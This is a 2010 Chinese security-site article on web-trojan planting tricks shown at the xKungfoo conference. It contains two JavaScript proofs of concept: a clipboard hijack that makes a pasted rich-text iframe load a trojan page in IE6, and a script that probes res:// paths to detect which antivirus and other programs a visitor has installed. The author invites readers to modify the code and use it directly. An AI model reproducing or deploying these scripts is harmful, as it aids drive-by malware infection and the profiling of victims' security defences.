热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

xKungfoo上的网马技巧

发布时间:2010-06-02 09:33文章来源:未知文章作者:黑白前线 点击次数:
摘要:今天xKungfoo最后一天,G在上面做了个挂马产业链的议题。有些挂马猥亵技巧没有说详细,这里公开吧。其实有些没什么,就是技巧,有些人也玩过。 第一个、剪贴板劫持挂马 其实这是针对富文本编辑器的一种隐蔽的攻击方式,当你粘贴某段从别处拷贝来的文字时,就...

今天xKungfoo最后一天,G在上面做了个挂马产业链的议题。有些挂马猥亵技巧没有说详细,这里公开吧。其实有些没什么,就是技巧,有些人也玩过。

 

第一个、剪贴板劫持挂马

其实这是针对富文本编辑器的一种隐蔽的攻击方式,当你粘贴某段从别处拷贝来的文字时,就会执行一个iframe标签对象(富文本编辑器的性质),iframe加载网马。简单的demo:

 

  1. <iframe src=http://www.baidu.com/ height=110 width=110></iframe> 
  2. <script> 
  3. var iframe = document.getElementsByTagName("iframe")[0];  
  4. var rng = document.body.createControlRange();  
  5. rng.add(iframe);  
  6. rng.execCommand('Copy');  
  7. </script> 

只在IE6下有效,如何去扩展就看各位了,其实一般这样猥亵的技巧仅供娱乐,真正的运用,我觉得也是不太可能的,除非它变得更加猥亵。

 

第二个、img远程域检测本地域软件安装情况

网马要检测本地安装什么软件?无非就是那些安全软件,卡巴、小红伞、360、365门神(AD:顺便说下,365不是畅游巡警的山寨- -,和360的定位是不一样的)之类。稳定的demo:

  1. <script> 
  2. ////////////////////////////////////////////////////////  
  3. //Name: img标签远程域检测本地域软件是否存在poc  
  4. //Description: IE浏览器都有效  
  5. //Author: Knownsec Team  
  6. //Date: 2008-11-03  
  7. ////////////////////////////////////////////////////////  
  8. knownImg = {}  
  9. knownImg.resList = [ //数组中填写本地软件id值与图片地址值(res协议或file协议)  
  10. {id: 'Avira', res: 'res://C:\\Program%20Files\\Avira\\AntiVir%20PersonalEdition%20Classic\\setup.dll/#2/#132'},  
  11. {id: 'baidu', res: 'res://C:\\Program%20Files\\baidu\\Baidu%20Hi\\BaiduHi.exe/#2/#152'},  
  12. {id: 'Super Rabbit', res: 'res://C:\\Program%20Files\\Super%20Rabbit\\MagicSet\\timedate.exe/#2/BBNO'},  
  13. {id: '365Menshen', res: 'res://C:\\Program%20Files\\365Menshen\\menshen.exe/#2/#227'},  
  14. {id: 'quicktime', res: 'res://c:\\program%20files\\quicktime\\quicktimeplayer.exe/#2/#403'}  
  15. ];  
  16. knownImg.ok_resList = new Array(); //确认软件存在时,填入此数组  
  17. knownImg.tmp_resList = new Array();  
  18.  
  19. knownImg.checkSoft = function(){ //检测函数  
  20. if (document.all){  
  21. x = new Array();  
  22. for (i = 0; i < knownImg.resList.length; i++){  
  23. x[i] = new Image();  
  24. x[i].src = "";  
  25. knownImg.ok_resList.push(knownImg.resList[i].id); //将resList里的id值依次扔进ok_resList数组中  
  26. x[i].onload = function(){  
  27. //alert(knownImg.resList[i].id + ': return true');  
  28. }  
  29. x[i].onerror = function(){  
  30. //alert(knownImg.resList[i].id + ': return false');  
  31. knownImg.ok_resList.pop(); //软件不存在时,从ok_resList数组弹出对应的id值  
  32. }  
  33. x[i].src = knownImg.resList[i].res;  
  34. }  
  35. }  
  36. }  
  37. knownImg.checkSoft();  
  38.  
  39. alert(knownImg.ok_resList); //弹出  
  40. document.write('你的系统中存在以下软件:<br />'+knownImg.ok_resList.join('<br />'));  
  41. </script> 
  42.  

IE6/7/8通杀,我写完这个POC没几天就被告之老外早已经给出POC了,上面这些代码是我们自己探讨出来的,当时对res协议还不太懂,还问了一些朋友。现在我们的这个POC扩展性好,很稳定。大家可以改改直接使用。

 

 

标签分类: 反木马 网马技巧

上一篇:电子取证远控木马之SRAT 反木马分析
下一篇:网马的反挂马检测及精确投放